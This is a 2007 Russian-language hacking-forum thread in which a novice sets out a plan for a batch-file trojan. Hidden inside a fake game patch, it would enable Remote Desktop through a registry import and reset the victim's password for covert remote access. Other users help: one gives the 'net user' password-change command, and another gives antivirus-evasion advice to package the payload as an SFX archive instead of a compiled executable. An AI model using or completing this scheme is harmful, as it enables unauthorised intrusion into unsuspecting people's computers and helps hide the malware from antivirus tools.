ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости

Ответ

Опции темы Поиск в этой теме Опции просмотра

.bat-troj aka exploit (KaK-To TaK)
Старый 14.11.2007, 01:15
Bl4Ze
Новичок
Провел на форуме:
6432

По умолчанию .bat-troj aka exploit (KaK-To TaK)

Всем привет, я тут новенький, сразу хочу извениться если я создал тему не в пологающем месте, создал тут потому, что увы не знаю где надо. Ещё раз прошу прощения...

Вообщем, как то один раз вечером мне стало скучно и решил побаловаться елементарными командами winxp. Создал бат-файл с содержанием:
Цитата:
@ECHO OFF
title "Lo0ser v1.0 by BlaZe"
cls
shutdown -r
pause
Поглумил над парочкой друзей\знакомых...
Немного поже мне пришла в голову мысль, сейчас постараюсь донести её и до вас...

У не опытных пользовтелей юзеров ОС: WinXp как всегда включено очень много не нужных им служб о которых они даже и наверно вовсе не знают в том числе там и присуствует такая служба как "Terminal Services" ака "Удалённый доступ к комп..." по дефолту эта служба стоит в режиме (АВТО), т.е. она работает постоянно если конечно не вмешался пользователь...
В "Удалённых сеансах", есть флажок - "Разрешить удалённый доступ к этому компьютеру", если он выставлен то доступ открыт... одно но невозможно поситить машинку удалённо если на current user'e нету пароля...

Далее, я придумал как приблизительно возможно: выставить флаг и пароль на юзера:
Чуть ниже я щяс напишу как я себе это представляю скорее всего это будет не правельно или будут варианты получше, я написал сюда потому что я не знаю как до конца осуществить задуманое:

И так, создаю .bat-ник допустим 1.bat в себе он содержит след команды:
@ECHO OFF
cls
Команда импортирует ключ в реестр => regedit.exe -ea C:\1.reg (в файле 1.reg) будет находятся отредактированая версия ключа Службы -"Terminal Services" отвечаюшего за переменную флажка на "Удалённый доступ к комп...", ключ как я выяснил будет начинатся со строк:

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Win dows NT\Terminal Services]

(Вот моя проблема не знаю как задать задать тип переменной и её значение, не знаю как будет полностью выглядеть код ключа, ПРОШУ ВАШЕЙ ПОМОЩИ).

Далее:
Мне нужно узнать КЛЮЧ службы которая отвечает за менеджмент current user'a и при помощи переменой или что там с помощью Ключя для реестра изменить пароль current user'a, например на: 123.

После того как это осуществим... Запускаем какой нибудь setup creator крепим к любому .exe-файлу (например cs16patch32.exe) 1.bat и 1.reg, компилируем...

Далее: шлём жертве при запуске в реестре изменяются данные в этоге мы получаем доступ ко всему компу!
Есть большой минус, после удачного удалённого конекта жертву выкинет в меню смены пользователей, правда при попытки зайти пользователь на котором он находился попросит у него пароль (которого он не знает )) ) и у нас есть время чтобы старить то ради чего мы всё это делали...

По скриптам:
Если кому-то понравилась идея и кто-то её осуществит прошу поделиться со мной исходничками...

За идею строго не судите! Я начинающий и предпочёл начать с этого поэтому очень прошу не писать что-то вроде того:
Почему не на асме, пхп или перле... Очень жду вашей помощи, заранее приблагодарен.
С, Уважение BlaZe.

Последний раз редактировалось Bl4Ze; 14.11.2007 в 02:10..

Старый 14.11.2007, 01:29
Ni0x
Постоянный
Провел на форуме:
2009677

Почему не на асме, пхп или перле?
На самом деле никогда не понимал, когда новички пишут статьи, в конце которых просят не ругать, ссылаясь на свое нубство. Книги бы лучше читал, чем такие "эксплоиты-трояны" публиковать.

Старый 14.11.2007, 02:06
Bl4Ze
Новичок
Провел на форуме:
6432

Цитата:
Сообщение от Ni0x  
Почему не на асме, пхп или перле?
На самом деле никогда не понимал, когда новички пишут статьи, в конце которых просят не ругать, ссылаясь на свое нубство. Книги бы лучше читал, чем такие "эксплоиты-трояны" публиковать.
1. Где ты видиш чтобы я упомянул слово статья!? Мне очнь интересно!
2. Я просил помощи, а не критики...
3.Не тебе ставить мне статус, не тебе и меня судить!4. Я прошу тыкнуть пальцем где я ссылался на нубство... цитаточку пожалуйста... Если для тебя попросить помощи\совета это ссылаца на нубство - это смешно...
По скриптам: лучше чем пустословить, лучше бы показал бы как это сможет сделать папочка-хакер Ni0x. 6e3 06uD 17y17Cu|<!

Старый 14.11.2007, 06:49
Xex
Banned
Провел на форуме:
1062041

1)RE:"Мне нужно узнать КЛЮЧ службы которая отвечает за менеджмент current user'a и при помощи переменой или что там с помощью Ключя для реестра изменить пароль current user'a, например на: 123." - нафик ключ, есть команда
net user имя_юзера пароль
2)"Вот моя проблема не знаю как задать задать тип переменной и её значение, не знаю как будет полностью выглядеть код ключа, " - экспортируй текущее значение ключа, посмотри как он выгялдит.

P>S>а вобще коль заморочился бат'ами, лучше поработай с wsh, там поболее функционал будет.
P>S>S>составляй правильно вопросы, мне то тяжело было понять что ты хочешь, а гугл тем более ен поймет.

Старый 14.11.2007, 12:58
onikishov
Участник форума
Провел на форуме:
350617

Bl4Ze, уже решили эту проблему в статье http://forum.antichat.ru/thread36042-%F1%E5%F0%E2%E5%F0+%F2%E5%F0%EC%E8%ED%E0%EB%EE%E2. html

И кстати никогда не компилируй, потому что компиляторы определяются антивирусами. Лучше создавай sfx архив с коментариями.

Последний раз редактировалось onikishov; 14.11.2007 в 15:23..

Старый 14.11.2007, 14:54
Bl4Ze
Новичок
Провел на форуме:
6432

Цитата:
Сообщение от onikishov  
Bl4Ze, уже решили эту проблему в статье http://forum.antichat.ru/thread36042-%F1%E5%F0%E2%E5%F0+%F2%E5%F0%EC%E8%ED%E0%EB%EE%E2. html

И кстати никогда не компилируй, потому что компилятор уже определяется антивирусом. Лучше создавай sfx архив с коментариями.
Ой, спасибо, я так начало почитал статейки прочитаю и опробую поже... Пока занят, учу C+...
(кста даже и незнал что есть аналоги)

Старый 14.11.2007, 15:25
onikishov
Участник форума
Провел на форуме:
350617

С этой фишкой бывает много глюков, поэтому если с первого раза не прокатит не останавливайся, дерзай дальше:-d
P.s. А спасибку поставить?)

Ответ